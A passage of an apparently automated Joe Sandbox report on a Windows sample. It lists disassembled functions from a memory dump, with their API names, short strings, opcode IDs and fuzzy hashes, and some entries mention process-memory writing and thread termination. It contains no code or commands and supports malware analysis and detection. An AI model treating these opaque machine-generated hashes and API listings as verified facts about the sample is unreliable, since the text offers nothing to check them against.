                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                                                    • Instruction ID: b21a852efcd8be21a7c4f12f3e1faaaf25d670793a334a42360af6185f5adc50
                                                                                                                    • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                                                    • Instruction Fuzzy Hash: 52119E36604B82CAE710DF1AE844159B7B4FB9AF80B954436CF8803B28DF78F465C780
                                                                                                                    Function 00007FF7BB84B748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                                    • Instruction ID: 12a1ed97c7cd0404bd86870af5f6f3d1c0b3670897498073a631bfe24c08de7f
                                                                                                                    • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                                    • Instruction Fuzzy Hash: 3B112E25608A41CBEB00AB2EE440329B3A4FFA6BC4F985034DF8D4766CCF2DE8618750
                                                                                                                    Function 00007FF7BB852ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                                                    • Instruction ID: 39fb6999d77bc3bee1785f3d9e2cde233e49f1ba23ff54a1279bede904933a9c
                                                                                                                    • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                                                    • Instruction Fuzzy Hash: F3117321A08A4281EB25AF2CF854379A360FF55B88F845031DF8D1A2BCDE7CE595C3A0
                                                                                                                    Function 00007FF7BB85D7F8 Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                                    • Instruction ID: 687cd1e54eff531f15a548cfc44a88aeb2ad97e05ad6626c841832a472269fbe
                                                                                                                    • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                                    • Instruction Fuzzy Hash: 2201D220A08B0282EE05AB3CE495479D361BFB7780BD40235EF4F51578CE2CE4A4C7A0
                                                                                                                    Function 00007FF7BB860008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB86003C
                                                                                                                    • TerminateThread.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB860047
                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB860055
                                                                                                                    • ~SyncLockT.VCCORLIB ref: 00007FF7BB86005E
                                                                                                                      • Part of subcall function 00007FF7BB85F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7BB860063,?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB85F7C9
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB86006A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3142591903-0
                                                                                                                    • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                                    • Instruction ID: 1b79385ca39a5d9d9090366ee05b81aece94a6d11043e8a742dbcd6af5f45b78
                                                                                                                    • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                                    • Instruction Fuzzy Hash: 4C012D36A1874186E740AF19E494269B360FBA9B50F504031DF8E43B69CF3CE4A2C790
                                                                                                                    Function 00007FF7BB811DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611280651-0
                                                                                                                    • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                    • Instruction ID: 2e4c1761702464d7898ae56f1839e9756f9a3d8d203c852b250c14e676c7f9ab
                                                                                                                    • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                    • Instruction Fuzzy Hash: 59014C10B09742A2EE057B3CD44817CA261FFA6B74F905734CB7E426F9DF38A9688390
                                                                                                                    Function 00007FF7BB85B5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                    • Instruction ID: 6b1b1968210800adbc0b1dba1e8dbcb820c188dd74b26cdfaf9e1bed24e53890
                                                                                                                    • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                    • Instruction Fuzzy Hash: BCF01210F1870242FF543BBEA8881B892917F7A745FC46030CE4A02279DE6DA4A946A0
                                                                                                                    Function 00007FF7BB8503F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                    • Instruction ID: a9b1ccca564700dd06a03834ab348d55cf6cb8be39fae777c16f8084e182fcad
                                                                                                                    • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                    • Instruction Fuzzy Hash: EFF01C14F1870282FF1437BDA8882B592517FAA749FC46030CE5A02269DD2DB8A946A0
                                                                                                                    Function 00007FF7BB866D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 948891078-24824748
                                                                                                                    • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                                                    • Instruction ID: b0ce648403858bc865fce3b71ccd504b17451e5277887f4e3d9092fe4ca67dbd
                                                                                                                    • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                                                    • Instruction Fuzzy Hash: 14D1A322718A4681EB10EB6DD4806ADA764FFAAB84F805032EF4E47B7DDE3CD504C790
                                                                                                                    Function 00007FF7BB820040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                    • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                    • Instruction ID: 5427fc6c6678cf6e35a5b7c238e8ce630ca8d5cecc198008b6afc1ce4c53f0f0
                                                                                                                    • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                    • Instruction Fuzzy Hash: 0781A272E0820389FB6A6F1D955027DA6A0FF33740FC44036CF0E536A9DA6CA870D2A1
                                                                                                                    Function 00007FF7BB80B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: $*
                                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                                    • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                    • Instruction ID: 9b814b7326b4f1f0847a86c351b5af38466d3a672b49cd891483ea438e695357
                                                                                                                    • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                    • Instruction Fuzzy Hash: AB61403290C24386F765AE2C845437CA7E2FB67B98FE51135CF49412BDCF68E46186A1
                                                                                                                    Function 00007FF7BB816408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID: !$asin
                                                                                                                    • API String ID: 1156100317-2188059690
                                                                                                                    • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                    • Instruction ID: 66346c8de2fcab77ed0ed271425f478bf1a811af654a93c12b396de77383616a
                                                                                                                    • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                    • Instruction Fuzzy Hash: F461B521C18F8189E6539B3C9811276D754BFBB3C0F909322EE9E35A79DF1DF0624A90
                                                                                                                    Function 00007FF7BB84EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                                                    • Instruction ID: 199eebcd77b4262f82924bd4d4a6424c926949eff58b4d99471012e50c959991
                                                                                                                    • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                                                    • Instruction Fuzzy Hash: 7451E13261868186D720EB5AE4849AEF760F7D9B84F841031EF4D53B69CF7CD605CB90
                                                                                                                    Function 00007FF7BB81EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 2456169464-4171548499
                                                                                                                    • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                                                    • Instruction ID: 4a36b2bb46e546709a4c10db10f854e56106bec523cc5a714dbd41f31f2e9cf2
                                                                                                                    • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                                                    • Instruction Fuzzy Hash: 7041B122A1974182EB209F2DE4443AAB7A0FB99795F808131EF4E877A8DF3CD451C790
                                                                                                                    Function 00007FF7BB88B454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                                    • Instruction ID: 4b5778852971ee95b25e71cfbd8667695d08fa4b1a6cdb0689ef268f33c6eb0a
                                                                                                                    • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                                    • Instruction Fuzzy Hash: 7E417E326097828BE7709B2CE444B9AB3A1F785760F544335DBA803BA9CF3CD855CB50
                                                                                                                    Function 00007FF7BB88AB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2671490118-1439706946
